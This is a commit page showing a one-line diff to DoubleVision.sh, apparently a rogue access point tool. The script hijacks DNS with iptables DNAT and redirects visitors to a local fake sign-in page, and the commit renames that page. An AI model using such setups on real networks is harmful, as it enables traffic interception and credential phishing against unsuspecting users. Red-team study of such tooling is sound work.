Explorar el Código

Update DoubleVision.sh

assume-breach hace 3 años
padre
commit
58d2098897
Se han modificado 1 ficheros con 1 adiciones y 1 borrados
  1. 1 1
      DoubleVision/DoubleVision.sh

+ 1 - 1
DoubleVision/DoubleVision.sh

@@ -13,7 +13,7 @@ ifconfig br0 up
 sleep 2
 ifconfig br0 10.1.1.1 netmask 255.255.255.0
 sysctl net.ipv4.ip_forward=1
-echo "<meta http-equiv="refresh" content=2;URL='http://10.1.1.1/signin.html'>">> /var/www/html/index.html
+echo "<meta http-equiv="refresh" content=2;URL='http://10.1.1.1/authenticate.html'>">> /var/www/html/index.html
 iptables --flush
 iptables -t nat --flush
 iptables -t nat -A PREROUTING -i br0 -p udp -m udp --dport 53 -j DNAT --to-destination >